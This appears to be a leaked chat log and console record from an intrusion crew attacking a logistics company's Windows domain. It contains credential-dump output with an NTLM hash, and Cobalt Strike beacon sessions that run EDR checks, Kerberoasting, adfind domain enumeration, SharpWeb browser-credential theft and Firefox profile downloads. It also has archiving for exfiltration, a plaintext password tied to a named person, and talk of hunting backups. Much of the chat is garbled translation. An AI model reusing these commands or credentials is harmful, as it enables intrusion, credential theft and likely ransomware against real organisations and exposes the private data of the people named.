05dd7dca30cf4eabf92fcfd2e951e608dea3af9e [00010000] CredentialKeys * NTLM : 7d9d843800ed5d922b69507f2dd2cfda * SHA1 : 05dd7dca30cf4eabf92fcfd2e951e608dea3af9e tspkg : wdigest : * Username : joel.reed * Domain : GLOBALNET * Password : (null) kerberos : * Username : joel.reed * Domain : GLOBALNET.LOCAL * Password : (null) ssp : credman : Authentication Id : 0 ; 2087392369 (00000000:7c6b1471) Session : RemoteInteractive from 11 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 9/16/2020 4:44:41 AM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 1983891583 (00000000:763fc87f) Session : RemoteInteractive from 10 User Name : g.boles Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 9/14/2020 1:20:20 PM SID : 
S-1-5-21-498103351-3997332795-3100871051-15102 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 1638269471 (00000000:61a6021f) Session : RemoteInteractive from 9 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 9/8/2020 11:31:51 PM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 504788415 (00000000:1e1675bf) Session : RemoteInteractive from 7 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 8/20/2020 11:56:26 PM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 472372604 (00000000:1c27d57c) Session : RemoteInteractive from 6 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 8/20/2020 11:32:37 AM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 472372568 (00000000:1c27d558) Session : RemoteInteractive from 6 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 8/20/2020 11:32:37 AM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 116428364 (00000000:06f08e4c) Session : RemoteInteractive from 4 User Name : ctrails Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 8/14/2020 12:56:27 PM SID : S-1-5-21-498103351-3997332795-3100871051-5297 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Time : 8/12/2020 11:31:00 PM SID : S-1-5-19 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) * kerberos : * Username : (null) * Domain : (null) * Password : (null) ssp : credman : ``Then it's time to sleep ``))`Did you manage to enter the main working domain 
with the EnterPrime? but I would have to look for the admin by the eta... yeah... as you can see the ing goes
``
beacon> edr_query localhost x64
[+] Determining what EDR products are installed on localhost...
[+] host called home, sent: 57 bytes
[+] ehdrv.sys Found
[+] 1 EDR Products Found!
======================
| Vendor Information |
----------------------
[+] ESET Found!
``
``
beacon> powershell-import /home/trash/tools/Invoke-Kerberoast.ps1
[*] Tasked beacon to import: /home/trash/tools/Invoke-Kerberoast.ps1
[+] host called home, sent: 12760 bytes
beacon> psinject 10292 x64 Invoke-Kerberoast -OutputFormat HashCat | fl
[*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat | fl into 10292 (x64)
[+] host called home, sent: 133723 bytes
beacon> whoami
[-] Unknown command: whoami
beacon> shell whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 37 bytes
[+] received output:
globalnet\sraadmin
``
strange guys strangely they separated the prod but left the mutual trust this trust domain clerks will and hashes Dana DK you tamu 2008 server why? no access first dsink I'll take it down...I want to see if my pid will give try to call something from your process fuck what psinject for example some weak script or something it doesn't matter, you're not alone, do you still have a session in the extended domain? ahem listen there's a lot of things to check = (noisy and they'll stay as artifacts for analysis = (no a lot of randl processes will stay there and then we'll have to shellcode them when we'll have to work a lot and so with migra problems we'll have to think how to locate...two domains we can do a simple what? you jump with an interpreter and fix it?
3.5MB fil 12/02/2020 18:11:39 ad_computers.txt
2.1MB fil 12/02/2020 18:11:47 ad_group.txt
159.8KB fil 12/02/2020 18:11:39 ad_ous.txt
159B fil 12/02/2020 18:11:44 ad_subnets.txt
445B fil 12/02/2020 18:11:53 ad_trustdmp.txt
12.8MB fil 12/02/2020 18:11:35 ad_users.txt
found
sraadmin can't this account jump into the main domain directly? okmmmmmtk if you use a system batnick then it will come off then try another host or something i can't get it off the polzak (memory protected) i can't get it on the systemdas polzak processes? what context are you trying to use?
ldap_get_next_page_s: [ADC02-PHX01.globalnet.local] Error 0x1 (1) - Operations Error
Uh-huh, wrong one.
adfind.exe -b DC=globalnet,DC=local -f "(objectcategory=person)" > ad_users.txt
adfind.exe -b DC=globalnet,DC=local -f "objectcategory=computer" > ad_computers.txt
adfind.exe -b DC=globalnet,DC=local -f "(objectcategory=organizationalUnit)" > ad_ous.txt
adfind.exe -b DC=globalnet,DC=local -subnets -f (objectCategory=subnet)> ad_subnets.txt
adfind.exe -b DC=globalnet,DC=local -f "(objectcategory=group)" > ad_group.txt
adfind.exe -b DC=globalnet,DC=local -gcb -sc trustdmp > ad_trustdmp.txt
``What am I doing wrong? Here is their entire cloud system in this domain``
For the full year, GlobalTranz reported $1.4 billion in revenue, representing 62 percent year-over-year growth, a net revenue increase of 63 percent, and EBITDA growth of 150 percent.
``
About GlobalTranz
GlobalTranz is a technology company providing award-winning cloud-based multi-modal Transportation Management System (TMS) products to shippers, carriers, 3PLs and brokers. GlobalTranz is leading the logistics software and services market in innovative technology that optimizes the efficiency of freight movement and matches shipper demand and carrier capacity in real-time.
Leveraging its extensive independent agent network, GlobalTranz has emerged as a fast-growing market leader with a customer base of over 1 million product users and 25,000 shippers. In 2018, Transport Topics named GlobalTranz a Top 10 largest freight brokerage firm in the U.S.
Take off the second domain, it's their prodadomain, it's the server domain
``
Group name Enterprise Admins
Comment Designated administrators of the enterprise
Members
``
``
Group name Domain Admins
Comment Designated administrators of the domain
Members
``
``
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
``
``
ADC02-PHX01.globalnet.local [DS] Site: PHX01
ADC03-PHX01.globalnet.local [PDC] [DS] Site: PHX01
GTZAZRGNADC01.globalnet.local [DS] Site: Azure-WestUS
GTZZRGNADC02.globalnet.local [DS] Site: Azure-WestUS
``
yeaheah Now we'll see))) well, let's gookaye bye bye all goodnight read all right, tomorrow by 3 then i searched among the domains) lol) aaaaaaand the logo as the children's world on the rightzoho where did you see it? i do not see her noticing a match and here it is on the screen this grid was at work so, so? do not understanda here is such a coincidencea we were just poking ita what's wrong with it?
#zohocorpin-com zohofiles delete)yes, sessions in the slip until tomorrow then and for today all will have time to get on rdto tomorrow to 301:12 PM`https://lastpass.com mharper@waterway.com LoveUnit14` and give shell timea logicalokayot system try it from his context? hehe`d you take away?
``
7-Zip (a) 18.05 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30
Scanning the drive:
2156 folders, 6028 files, 362713974 bytes (346 MiB)
Creating archive: ff.7z
Add new data to archive: 2156 folders, 6028 files, 362713974 bytes (346 MiB)
[+] received output:
Files read from disk: 6012
Archive size: 168244956 bytes (161 MiB)
----------------
WARNING: Cannot open 22 files
``
The blue one is the same as the one you put in the coboo where the session from it hangs in the C:\Users\mharper\AppData\Roaming\Mozilla\Firefox\Profiles\ get me and so on, we renamed it as native if anything, did you delete your files and put it in the original folder with your profile? i don't know how to check if it's ok, but i've already tried it, ff won't pick up the profile he put in the folder.
if everything is ok, tomorrow let's close it quietly and check access to this URL
Get the folder with his ff profile in the archive and dedicate it if not, by 4
tomorrow by 6 and if everything is ok, i thought these guys switched to paper and hand the access by Planes)

30203 http://192.168.0.75/
30824 https://192.168.0.75/
30825 https://192.168.0.75/#/login
30826 https://192.168.0.75/#/dashboard
30827 https://192.168.0.75/#/manage/storage/group/volumes/summary
30828 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002d/summary
30829 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002d/data_access/connections
30830 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002d/data_access/access
30831 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f27000000000000000000000007/summary
30832 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f27000000000000000000000007/data_protection
30833 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002e/summary
30834 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002e/data_protection
30835 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002e/data_access/connections
30836 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002e/data_access/access
30837 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002e/edit?startTabIndex=3
30890 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f27000000000000000000000034/summary

Bingo eat))
ww-nimble-01 https://192.168.0.75/#/login
basic nimbles: https://192.168.0.42 https://192.168.0.43 https://192.168.0.75 https://192.168.0.77
What's the host and what's nimbla's host? and he has a fat history there + he's gone out of his messages?)
I'm waiting for the last files and we won't leave until tomorrow. What about ff? so we haven't found nimbla access and close this network tomorrow by 6
let's finish with backups today. everywhere you touch backups, the whole network is full of backups. if not, we miss it. it's not certain that there is any, but you should look for it
htp://www://www.solarwinds.com/company/press-releases/2018-q1/solarwinds-introduces-cloud-first-backup-ѕervisetcurrent?
yeah no, it's monitoringc by the way there may be backups too it is solarwinds
no @user7 seemed to find accesses? change without .back and see what is it delete it tamag, take back version

beacon> shell copy places.sqlite places.sqlite.back
[*] Tasked beacon to run: copy places.sqlite places.sqlite.back
[+] host called home, sent: 68 bytes
[+] received output:
        1 file(s) copied.

in the keylog?
https://192.168.0.254 mharper@waterway.com LoveUnit14*
:thinking:
places.sqlite places.sqlite.back
?
shell copy places.sqlite
Try and try to make it with places, I'm losing my mind.

 Size     Type     Last Modified          Name
 ----     ----     -------------          ----
          dir      01/05/2021 09:46:52    bookmarkbackups
          dir      11/16/2020 21:37:15    browser-extension-data
          dir      01/04/2021 14:56:52    crashes
          dir      01/05/2021 12:48:45:45 datareporting
          dir      12/17/2020 09:33:11    extensions
          dir      09/04/2020 13:15:30    gmp
          dir      04/28/2020 08:26:45    gmp-gmpopenh264
          dir      04/28/2020 08:26:46    gmp-widevinecdm
          dir      10/19/2020 16:22:05    minidumps
          dir      01/05/2021 03:08:07    saved-telemetry-pings
          dir      04/28/2020 08:26:46    security_state
          dir      01/05/2021 12:48:46    sessionstore-backups
          dir      12/31/2020 10:12:55    shader-cache
          dir      04/28/2020 08:21:23    storage
          dir      01/05/2021 12:43:45    weave
 28kb     fil      01/05/2021 08:53:22    addons.json
 3kb      fil      01/04/2021 14:58:43    addonStartup.json.lz4
 0b       fil      01/04/2021 14:20:20    AlternateServices.txt
 3kb      fil      01/05/2021 12:43:47    autofill-profiles.json
 216b     fil      01/05/2021 12:06:12    broadcast-listeners.json
 352kb    fil      12/21/2020 09:14:06    cert9.db
 11kb     fil      12/21/2020 09:14:06    cert_override.txt
 0b       fil      01/04/2021 14:20:20    ClientAuthRememberList.txt
 199b     fil      12/23/2020 10:29:42    compatibility.ini
 1024b    fil      08/17/2020 10:57:55    containers.json
 224kb    fil      12/31/2020 11:18:27    content-prefs.sqlite
 1024kb   fil      01/05/2021 12:48:43    cookies.sqlite
 32kb     fil      01/04/2021 14:55:55    cookies.sqlite-shm
 0b       fil      01/04/2021 14:55:55    cookies.sqlite-wal
 132b     fil      08/03/2020 14:38:42    enumerate_devices.txt
 1kb      fil      11/16/2020 21:37:17    extension-preferences.json
 470b     fil      01/04/2021 14:55:57    extension-settings.json
 90kb     fil      01/05/2021 08:55:23    extensions.json
 10mb     fil      01/04/2021 14:17:59    favicons.sqlite
 32kb     fil      01/04/2021 14:55:55    favicons.sqlite-shm
 320kb    fil      01/04/2021 15:13:24    favicons.sqlite-wal
 864kb    fil      01/05/2021 11:52:07    formhistory.sqlite
 1kb      fil      12/31/2020 10:59:25    handlers.json
 16kb     fil      08/15/2019 11:32:20    key3.db
 288kb    fil      08/15/2019 11:32:20    key4.db
 3kb      fil      01/05/2021 03:08:07    logins-backup.json
 3kb      fil      01/05/2021 09:08:12    logins.json
 18kb     fil      12/31/2020 12:15:22    notificationstore.json
 0b       fil      01/04/2021 14:55:55    parent.lock
 96kb     fil      01/04/2021 15:30:37    permissions.sqlite
 507b     fil      04/28/2020 08:21:23    pkcs11.txt
 25mb     fil      01/05/2021 11:52:08    places.sqlite
 32kb     fil      01/04/2021 14:55:55    places.sqlite-shm
 3mb      fil      01/05/2021 11:52:08    places.sqlite-wal
 1kb      fil      12/24/2020 09:30:13    pluginreg.dat
 29kb     fil      01/05/2021 12:43:45    prefs.js
 64kb     fil      01/04/2021 14:57:35    protections.sqlite
 532b     fil      01/04/2021 14:55:57    search.json.mozlz4
 0b       fil      01/04/2021 14:20:20    SecurityPreloadState.txt
 11kb     fil      01/04/2021 14:56:02    serviceworker.txt
 90b      fil      01/04/2021 14:55:56    sessionCheckpoints.json
 2kb      fil      01/05/2021 12:05:42
 3kb      fil      01/05/2021 09:08:10    signedInUser.json
 53kb     fil      01/05/2021 12:48:58    SiteSecurityServiceState.txt
 32kb     fil      08/01/2020 09:29:18    storage-sync-v2.sqlite
 32kb     fil      01/04/2021 14:57:39    storage-sync-v2.sqlite-shm
 1mb      fil      12/16/2020 12:00:52    storage-sync-v2.sqlite-wal
 128kb    fil      07/29/2020 19:52:03    storage-sync.sqlite
 22kb     fil      01/04/2021 14:55:56    storage.sqlite
 47b      fil      04/28/2020 08:21:19    times.json
 13mb     fil      01/04/2021 15:09:04    webappsstore.sqlite
 32kb     fil      01/04/2021 14:55:55    webappsstore.sqlite-shm
 704kb    fil      01/04/2021 15:47:03    webappsstore.sqlite-wal
 1kb      fil      01/05/2021 12:20:58    xulstore.json

Give me the profile listing I can't find it and take the second one and make a copy History History.back

====== FirefoxHistory ======
ERROR: IO exception, places.sqlite file likely in use (i.e. Firefox is likely running). The process cannot access the file 'C:\Users\mharper\AppData\Roaming\Mozilla\Firefox\Profiles\krbjz40r.default-1588080079106\places.sqlite' because it is being used by another process.
History (mharper):

I'll compare if it's ok, we'll just take the history just in case and give me both files.
places.sqlite This file contains all your Firefox bookmarks and lists of all the files you've downloaded and websites you've visited.
History
beacon> download C:\Users\mharper\AppData\Roaming\Mozilla\Firefox\Profiles\krbjz40r.default-1588080079106\places.sqlite
[*] Tasked beacon to download C:\Users\mharper\AppData\Roaming\Mozilla\Firefox\Profiles\krbjz40r.default-1588080079106\places.sqlite
[+] host called home, sent: 110 bytes
[*] started download of C:\Users\mharper\AppData\Roaming\Mozilla\Firefox\Profiles\krbjz40r.default-1588080079106\places.sqlite (26214400 bytes)
[+] received output:
[-] Invoke_3 on EntryPoint failed.

I wonder where he went through his History file, I guess it's time to look for an alternative, I told you, he's the usual

beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpWeb.exe all
[*] Tasked beacon to run .NET program: SharpWeb.exe all
[+] host called home, sent: 705073 bytes
[+] received output:
=== Chrome (Current User) ===
[X] Exception: Key not valid for use in specified state.
=== Checking for Firefox (Current User) ===
=== Checking Windows Vaults ===
[-] Invoke_3 on EntryPoint failed.

If it works, give me the output I told you about it so sharpweb?)
than shoot it, check if the backups are up to date, give ffu only chrome, it must have worked in the fall have you?
I have not worked at all)
sharpweb as usual and you and chrome ffu have pulled?
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title ========================= ======== ================ =========== ============ =============== ================================================== ============ ======================================================================== System Idle Process 0 Services 0 8 K Unknown NT AUTHORITY\SYSTEM 2195:13:43 N/A System 4 Services 0 4,980 K Unknown NT AUTHORITY\SYSTEM 32:36:26 N/A Secure System 88 Services 0 40,516 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A Registry 152 Services 0 78,556 K Unknown NT AUTHORITY\SYSTEM 0:00:13 N/A smss.exe 740 Services 0 1,032 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A csrss.exe 1144 Services 0 3,304 K Unknown NT AUTHORITY\SYSTEM 0:01:06 N/A wininit.exe 1236 Services 0 2,900 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A csrss.exe 1244 Console 1 19,380 K Running NT AUTHORITY\SYSTEM 0:04:58 N/A services.exe 1308 Services 0 13,988 K Unknown NT AUTHORITY\SYSTEM 0:03:53 N/A LsaIso.exe 1320 Services 0 2,100 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A lsass.exe 1336 Services 0 26,320 K Unknown NT AUTHORITY\SYSTEM 0:20:34 N/A svchost.exe 1460 Services 0 2,332 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 1484 Services 0 37,304 K Unknown NT AUTHORITY\SYSTEM 0:03:38 N/A WUDFHost.exe 1508 Services 0 2,336 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A fontdrvhost.exe 1536 Services 0 1,548 K Unknown Font Driver Host\UMFD-0 0:00:07 N/A svchost.exe 1604 Services 0 21,892 K Unknown NT AUTHORITY\NETWORK SERVICE 0:07:21 N/A svchost.exe 1652 Services 0 8,252 K Unknown NT AUTHORITY\SYSTEM 0:01:47 N/A winlogon.exe 1748 Console 1 18,156 K Unknown NT AUTHORITY\SYSTEM 0:01:11 N/A fontdrvhost.exe 1812 Console 1 8,048 K Unknown Font Driver Host\UMFD-1 0:03:45 N/A svchost.exe 1936 Services 0 18,244 K Unknown NT AUTHORITY\NETWORK SERVICE 0:04:46 N/A svchost.exe 1952 Services 0 3,888 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A svchost.exe 1964 Services 0 6,180 K Unknown NT 
AUTHORITY\LOCAL SERVICE 0:00:03 N/A dwm.exe 1992 Console 1 116,224 K Running Window Manager\DWM-1 1:22:41 DWM Notification Window svchost.exe 2000 Services 0 2,292 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 1096 Services 0 4,480 K Unknown NT AUTHORITY\LOCAL SERVICE 0:02:37 N/A svchost.exe 1596 Services 0 4,944 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 1648 Services 0 6,040 K Unknown NT AUTHORITY/LOCAL SERVICE 0:00:00 N/A svchost.exe 876 Services 0 7,480 K Unknown NT AUTHORITY/NETWORK SERVICE 0:14:02 N/A svchost.exe 2124 Services 0 2,872 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 2300 Services 0 22,864 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:20 N/A svchost.exe 2352 Services 0 21,184 K Unknown NT AUTHORITY\LOCAL SERVICE 0:02:03 N/A svchost.exe 2424 Services 0 8,128 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:57 N/A NVDisplay.Container.exe 2452 Services 0 7,964 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 2472 Services 0 7,292 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 2600 Services 0 7,420 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:50 N/A svchost.exe 2724 Services 0 5,660 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:08 N/A svchost.exe 2792 Services 0 21,376 K Unknown NT AUTHORITY\SYSTEM 0:06:22 N/A svchost.exe 2836 Services 0 7,808 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 2844 Services 0 7,832 K Unknown NT AUTHORITY\SYSTEM 0:14:02 N/A svchost.exe 2856 Services 0 2,872 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 2864 Services 0 5,188 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A svchost.exe 2872 Services 0 11,080 K Unknown NT AUTHORITY\SYSTEM 0:00:18 N/A Memory Compression 3064 Services 0 430,432 K Unknown NT AUTHORITY\SYSTEM 0:05:03 N/A svchost.exe 2536 Services 0 6,624 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A svchost.exe 3104 Services 0 5,832 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 3140 Services 0 6,612 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 3148 Services 0 
6,960 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:20 N/A svchost.exe 3340 Services 0 5,788 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 3608 Services 0 3,948 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:03 N/A spaceman.exe 3640 Services 0 716 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 3712 Services 0 7,372 K Unknown NT AUTHORITY\SYSTEM 0:00:13 N/A svchost.exe 3764 Services 0 4,756 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 3988 Services 0 11,608 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:11 N/A svchost.exe 4084 Services 0 19,856 K Unknown NT AUTHORITY\SYSTEM 0:01:15 N/A svchost.exe 3204 Services 0 4,208 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A svchost.exe 3136 Services 0 3,100 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A svchost.exe 8 Services 0 3,436 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 4172 Services 0 6,224 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A spoolsv.exe 4268 Services 0 28,488 K Unknown NT AUTHORITY\SYSTEM 0:00:25 N/A vmms.exe 4640 Services 0 14,652 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A BASupSrvcUpdater.exe 4648 Services 0 12,480 K Unknown NT AUTHORITY\SYSTEM 0:01:14 N/A armsvc.exe 4656 Services 0 2,852 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A VmsWebGateway.exe 4664 Services 0 47,684 K Unknown NT AUTHORITY\SYSTEM 0:23:36 N/A 3CXWMRemoteControlSvc.exe 4672 Services 0 2,972 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 4680 Services 0 7,236 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A svchost.exe 4688 Services 0 2,956 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A svchost.exe 4704 Services 0 33,592 K Unknown NT AUTHORITY\SYSTEM 0:01:15 N/A BASupSrvc.exe 4720 Services 0 23,504 K Unknown NT AUTHORITY\SYSTEM 0:07:03 N/A DymoPnpService.exe 4732 Services 0 4,460 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 4740 Services 0 34,384 K Unknown NT AUTHORITY\LOCAL SERVICE 0:04:11 N/A AdobeUpdateService.exe 4748 Services 0 3,516 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A PcmService.exe 4756 
Services 0 10,676 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 4772 Services 0 3,248 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A SDFSSvc.exe 4764 Services 0 9,532 K Unknown NT AUTHORITY\SYSTEM 0:01:11 N/A svchost.exe 4780 Services 0 1,984 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A vmware-authd.exe 4796 Services 0 6,124 K Unknown NT AUTHORITY\SYSTEM 0:13:46 N/A EPUpdateService.exe 4804 Services 0 9,680 K Unknown NT AUTHORITY\SYSTEM 0:01:10 N/A sqlwriter.exe 4812 Services 0 3,068 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A SDUpdSvc.exe 4820 Services 0 14,560 K Unknown NT AUTHORITY\SYSTEM 0:00:50 N/A RtkAudUService64.exe 4828 Services 0 3,632 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A IpOverUsbSvc.exe 4836 Services 0 4,736 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 4844 Services 0 36,140 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:28 N/A svchost.exe 4860 Services 0 13,024 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A bdredline.exe 4868 Services 0 10,680 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 4876 Services 0 7,516 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:14 N/A NCentralLauncherService.e 4896 Services 0 11,280 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 4904 Services 0 3,872 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A RedGate.Client.Service.ex 4912 Services 0 27,480 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A EPIntegrationService.exe 4920 Services 0 14,488 K Unknown NT AUTHORITY\SYSTEM 0:01:31 N/A vmnetdhcp.exe 4936 Services 0 2,716 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A mDNSResponder.exe 4944 Services 0 4,056 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A svchost.exe 4952 Services 0 2,768 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A AGMService.exe 4960 Services 0 9,396 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A agent.exe 4972 Services 0 244,776 K Unknown NT AUTHORITY\SYSTEM 0:13:16 N/A wgsslvpnsrc.exe 4980 Services 0 2,796 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A EPProtectedService.exe 5008 Services 0 6,552 K Unknown NT 
AUTHORITY\SYSTEM 0:00:12 N/A vmware-usbarbitrator64.ex 5036 Services 0 3,968 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A EPSecurityService.exe 5048 Services 0 332,708 K Unknown NT AUTHORITY\SYSTEM 3:07:02 N/A vmnat.exe 5124 Services 0 3,480 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A AGSService.exe 5144 Services 0 8,696 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A CptService.exe 5156 Services 0 2,948 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A TeamViewer_Service.exe 5384 Services 0 5,952 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A svchost.exe 5392 Services 0 3,520 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:03 N/A svchost.exe 5508 Services 0 5,976 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 5540 Services 0 3,440 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A svchost.exe 5580 Services 0 5,104 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A SDWSCSvc.exe 5612 Services 0 5,748 K Unknown NT AUTHORITY\SYSTEM 0:01:39 N/A svchost.exe 5808 Services 0 5,472 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A dasHost.exe 5932 Services 0 7,188 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A svchost.exe 6804 Services 0 4,624 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:01 N/A GWCtlSrv.exe 7056 Services 0 129,840 K Unknown NT AUTHORITY\SYSTEM 1:04:01 N/A unsecapp.exe 7416 Services 0 4,216 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A dasHost.exe 7920 Services 0 1,780 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:00 N/A svchost.exe 8480 Services 0 4,196 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A vmcompute.exe 8552 Services 0 2,560 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 9192 Services 0 4,268 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 8084 Services 0 3,156 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A dllhost.exe 9356 Services 0 6,404 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A WmiPrvSE.exe 9456 Services 0 44,636 K Unknown NT AUTHORITY\SYSTEM 0:17:58 N/A svchost.exe 11224 Services 0 4,700 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A NableSixtyFourBitManager. 
9308 Services 0 35,324 K Unknown NT AUTHORITY\SYSTEM 0:18:15 N/A conhost.exe 9280 Services 0 3,812 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A NableReactiveManagement.e 8436 Services 0 15,752 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A conhost.exe 8432 Services 0 3,812 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 10260 Services 0 13,796 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 11552 Services 0 8,116 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A SolarWinds.MSP.CacheServi 10272 Services 0 24,052 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:11 N/A SolarWinds.MSP.RpcServerS 12376 Services 0 17,752 K Unknown NT AUTHORITY\SYSTEM 0:00:12 N/A NVDisplay.Container.exe 12824 Console 1 23,560 K Running NT AUTHORITY\SYSTEM 0:00:12 NvSvc svchost.exe 13072 Services 0 5,272 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:47 N/A svchost.exe 3972 Services 0 9,556 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A cmd.exe 10692 Services 0 3,472 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A conhost.exe 3472 Services 0 4,636 K Unknown NT 